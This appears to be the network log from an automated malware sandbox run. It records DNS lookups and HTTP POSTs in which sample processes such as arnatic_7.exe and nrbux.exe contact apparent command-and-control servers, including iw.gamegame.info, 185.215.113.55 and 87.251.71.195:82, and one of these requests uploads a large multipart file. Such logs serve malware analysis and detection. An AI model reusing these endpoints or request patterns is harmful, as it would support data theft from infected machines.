                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:45 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07adb5df00007cdc499c8000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9QnfdOnF7JS4DKO7hUvHnEClyt7dajrXefC7Fh1zeO2CaglAUX1wwFT1BtPGcc5STofSjDGFrcTc0mQTx10VzHQrOPj9ad%2FWND0qKmIEZzdMDjWWlTa4QZyNjavdBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686189c9bb87cdc-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07addec00000416863989000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kdgDxNOcBOhP0gq2nYPhwJ4niLCuFDjy9Ib1AiAZkvWYrlgFJA4NbEBQS04aaU01RzYuDU9QVQTX6jofk9GWtYsZpbct2T0oyhdWAibqD%2Bbke5y73UHV9XMcd0E3mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668618de0d924168-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        any.edge.bing.com
                                                                                                                                                                                        any.edge.bing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        204.79.197.200
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        go.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        go.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        go.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        go.microsoft.com.edgekey.net
                                                                                                                                                                                        go.microsoft.com.edgekey.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        e11290.dspg.akamaiedge.net
                                                                                                                                                                                        e11290.dspg.akamaiedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        23.66.21.99
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.microsoft.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.microsoft.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.microsoft.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                                                        www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        e13678.dscb.akamaiedge.net
                                                                                                                                                                                        e13678.dscb.akamaiedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        95.100.186.52
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        a-0001.a-afdentry.net.trafficmanager.net
                                                                                                                                                                                        a-0001.a-afdentry.net.trafficmanager.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        www-bing-com.dual-a-0001.a-msedge.net
                                                                                                                                                                                        www-bing-com.dual-a-0001.a-msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        dual-a-0001.a-msedge.net
                                                                                                                                                                                        dual-a-0001.a-msedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        204.79.197.200
                                                                                                                                                                                        dual-a-0001.a-msedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        13.107.21.200
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.bing.com/cortanaassist/rules?cc=US&version=6
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        204.79.197.200:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
                                                                                                                                                                                        host: www.bing.com
                                                                                                                                                                                        accept: */*
                                                                                                                                                                                        accept-encoding: gzip, deflate, br
                                                                                                                                                                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                                                                                                                        dnt: 1
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/2.0 404
                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                        content-length: 38996
                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                        content-encoding: br
                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                        p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                                                                                        set-cookie: MUID=348E364F7850603323FE262779AA61AE; domain=.bing.com; expires=Wed, 27-Jul-2022 07:18:01 GMT; path=/; secure; SameSite=None
                                                                                                                                                                                        set-cookie: MUIDB=348E364F7850603323FE262779AA61AE; expires=Wed, 27-Jul-2022 07:18:01 GMT; path=/; HttpOnly
                                                                                                                                                                                        set-cookie: _EDGE_S=F=1&SID=2AC13AA3B84C63830AA72ACBB9B6622F&mkt=en-us; domain=.bing.com; path=/; HttpOnly
                                                                                                                                                                                        set-cookie: _EDGE_V=1; domain=.bing.com; expires=Wed, 27-Jul-2022 07:18:01 GMT; path=/; HttpOnly
                                                                                                                                                                                        set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: SRCHUID=V=2&GUID=3EC0BC3226644BD4A2CF79BE618C7FA9&dmnchg=1; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: SRCHUSR=DOB=20210702; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sun, 02-Jul-2023 07:18:01 GMT; path=/
                                                                                                                                                                                        set-cookie: _SS=SID=2AC13AA3B84C63830AA72ACBB9B6622F; domain=.bing.com; path=/
                                                                                                                                                                                        x-snr-routing: 1
                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        x-error-page: 404-custom
                                                                                                                                                                                        x-ua-compatible: IE=edge
                                                                                                                                                                                        x-cache: CONFIG_NOCACHE
                                                                                                                                                                                        x-msedge-ref: Ref A: CEE3573C0F334C8FBC644ABD26FC1C56 Ref B: BUH01EDGE0414 Ref C: 2021-07-02T07:18:01Z
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:06 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ae07de0000fd05409a0000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mYvR9fCRphDB6nz84p5RFU2fr5vgi8pd6gyDH44E%2BmumsW%2Bdo4DQifiheFX1KE%2BCJ54hc1Cnxubc63LCSN2ELhlbhxYSi4fN90vzlXHHdBApkTf%2Bw7q4%2B8p32Hexlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686191fca2afd05-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:15 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----fac0658007086c8b8875231aa8edf853
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89441
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:16 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ae328600001649ad9d3000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uq3wiZy%2B45IJ6RofSZTElPxWzGIwf8%2FNoZsSuDaNFf5fc7ZdVSqxPadvmr%2B9rcIduEKlBYMxDizGPpy7VV6e8u2v7g%2FpY2VvcRkyOVcOal3Wr5Std%2BSq5mpRop%2Fc8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861964095f1649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:27 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ae5b3a00000d46931df000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gGB00Tz1sfeWS8QjWWcZwBD1zzi8awCOpQWiaZgEj6Q%2BMNAmEfOAaNZigohTR%2BkTmBfiTB4kU%2BniZATXuIguQo2O0uYNeMiP0uh7egKirHnQPRvP7g4mmQSwyP0qZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668619a529050d46-ARN
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:37 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ae836e0000d443be05c000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Xl5fbKmsBv8%2FABbPIM3yOm%2Fy2G%2BVQsuh4%2BaCJvr48gW%2FCxcoE0Ax3LSVBzrEouINXoyqM%2FK8h2LNW6MSRbFKxasYomKMRrNf75Ezn%2BKZP5ul8rLggGiO2g9rg9WJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668619e57ec1d443-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:47 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aeab6200001bd518aff000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=QCbXB6Xk5nMRglYbIFZJnGBXsxuyTdJKLE8%2BsQPVSxzFiMyW4Xpu0UEemxHX3O4HwhYyDhZhyWx%2Ff4v9VgSKHtwFMu4ACyKYAZAUcc0nmhzQfUzb2gS3rAh%2FRbthJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861a2569a21bd5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:18:58 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aed49800007251598b5000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=1k2MJvUtHKmk38Kq5JKrNBH2a2NDZFj3d54zQ5scOzI4BvRfApZzBheymXzLrK82C%2FmX95YI%2BDNDa5my%2FphlxuD1F%2B9z3QnSFTSlboS%2B8vCn%2FGXG2rwhcAl6%2BP9uzw%3D%3D"}],"group":"cf-nel","max_age":604800}
